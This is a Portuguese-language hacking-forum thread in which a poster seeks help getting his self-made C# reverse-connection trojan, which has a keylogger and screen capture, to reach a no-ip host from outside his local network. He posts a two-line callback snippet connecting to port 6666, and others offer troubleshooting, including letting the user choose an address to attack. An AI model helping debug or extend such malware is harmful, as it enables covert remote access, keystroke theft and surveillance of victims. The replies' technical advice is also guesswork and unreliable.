Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

Ajuda com Trojan

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    C# Ajuda com Trojan

    Bom galera criei um trojan em c#, mas estou tendo problemas de conexão, só funfa na rede local.
    É de conexão reversa, já liberei as portas no modem já fiz de tudo e ainda não consigo conectar, parece que o servidor não acha o endereço no-ip, ou a conexão não passa pro cliente...

    Se alguem puder ajudar a resolver o problema ficarei muito grato.
    Obrigado.
    Similar Threads

  • Font Size
    #2
    Irmão, ninguém vai conseguir resolver absolutamente NADA, sem a source do código.

    Shalom!
    sigpic
    Eis que estou à porta, e bato; se alguém ouvir a minha voz, e abrir a porta,
    entrarei em sua casa, e com ele cearei, e ele comigo. (Apocalipse 3:20)

    https://twitter.com/jackads
    http://www.facebook.com/jackson.beneteferreira

    Comment


    • Font Size
      #3
      o problema acredito eu que não esteja no código, até prq como falei antes funciona em rede local, queria a ajuda de alguem com expriência em trojan, ou sockets c#, enquanto isso vo tentando aki.
      Ah e não vo da o souce de bandeja né, tem muito Skiddie por aí.

      Comment


      • Font Size
        #4
        Postado Originalmente por Dano Ver Post
        o problema acredito eu que não esteja no código, até prq como falei antes funciona em rede local, queria a ajuda de alguem com expriência em trojan, ou sockets c#, enquanto isso vo tentando aki.
        Ah e não vo da o souce de bandeja né, tem muito Skiddie por aí.
        É irmão você que sabe, não é todo mundo mesmo que nasceu para fazer parte da comunidade Open Source, para quem gosta de compartilhar e de ajudar não tem essa, libera o código mesmo e não importa quem vai pegar ou deixar de pegar, mas a vida é assim mesmo, você tem uma escolha e não é obrigado a compartilhar seus códigos.

        Mas eu te falo com sinceridade, na minha opinião o problema provavelmente está no código mesmo, e se você quer que alguém te ajude sem liberar o código para a pessoa você nunca vai conseguir arrumar nada aí.
        É a mesma coisa que eu passar um e-mail para a Adobe falando de um crash que encontrei no Photoshop e ela falar "arruma aí".... HOW!?

        Eu só digo isso para te ajudar, eu nem programo em C# então essa source não acrescenta nada para mim e nem posso te ajudar, mas para quem pode vai precisar do código. Ou pelo menos explica mais do erro, deixa screenshot... sei lá.

        Shalom!
        sigpic
        Eis que estou à porta, e bato; se alguém ouvir a minha voz, e abrir a porta,
        entrarei em sua casa, e com ele cearei, e ele comigo. (Apocalipse 3:20)

        https://twitter.com/jackads
        http://www.facebook.com/jackson.beneteferreira

        Comment


        • Font Size
          #5
          Então analisando melhor, parece que o erro é no código mesmo, por enquanto o connnect tá assim:
          Código PHP:
          IPAddress host Dns.GetHostEntry("xxx.no-ip.org").AddressList[0];    
                              
          tcpClient.Connect(host6666
          Espero ajuda, Obrigado.

          Comment


          • Font Size
            #6
            Tá com medo de liberar o Código ? Bom eu não conheço muito de C#, mais envez de se conectar com o Host do NO-IP, você já tentou de outra forma ? Uma ponte talvez ?


            WCG147
            sigpic

            Comment


            • Font Size
              #7
              Libera o codigo aí, irmão. Ninguem vai roubar o seu trojan, e sera mais facil ajudar

              Comment


              • Font Size
                #8
                Já liberei, o que mais tu quer? é só a parte do connect que preciso de ajuda o resto(keylogger,captura de tela, etc,) ta normal.
                O que presisa já postei meu caro, espero ser ajudado.
                Até mais.

                Comment


                • Font Size
                  #9
                  IPAddress host = Dns.GetHostEntry("xxx.no-ip.org").AddressList[0];
                  tcpClient.Connect(host, 6666)
                  Irmão eu não programo em C# por isso não vou poder te ajudar tanto, mas como esse pedaço de código não é muito característico de C# eu posso interpretar com facilidade e isso me permite chutar o que pode ser.
                  Mas como só tem um pedaço do código e eu não sei o que está armazenado nos vetores eu não sei se vou estar certo ok?

                  Você falou que:
                  só funfa na rede local.
                  Olha denovo para este pedaço do código:
                  IPAddress host = Dns.GetHostEntry("xxx.no-ip.org").AddressList[0];
                  tcpClient.Connect(host, 6666)
                  Se os dados que estiverem na posição "0" do vetor "AddressList[0]" for o endereço da rede local então aí está o problema, você está sempre chamando "AddressList[0]" então você vai sempre chamar o endereço da rede local.

                  Tenta chamar algum outro endereço que estiver em outra posição do vetor como:
                  IPAddress host = Dns.GetHostEntry("xxx.no-ip.org").AddressList[1];
                  tcpClient.Connect(host, 6666)
                  ou se não tiver nada armazenado na posição coloca o endereço aí que você quer e tenta, ou coloca antes desse bloco uma pequena rotina para o usuário definir qual endereço que ele quer atacar, aí o endereço fica armazenado na posição do vetor a ser chamada. Entende?

                  Veja se é isso, depois posta pra gente o que deu e se for outra coisa deixa pra gente aqui a solução.


                  Shalom!
                  sigpic
                  Eis que estou à porta, e bato; se alguém ouvir a minha voz, e abrir a porta,
                  entrarei em sua casa, e com ele cearei, e ele comigo. (Apocalipse 3:20)

                  https://twitter.com/jackads
                  http://www.facebook.com/jackson.beneteferreira

                  Comment

                  X
                  Working...
                  X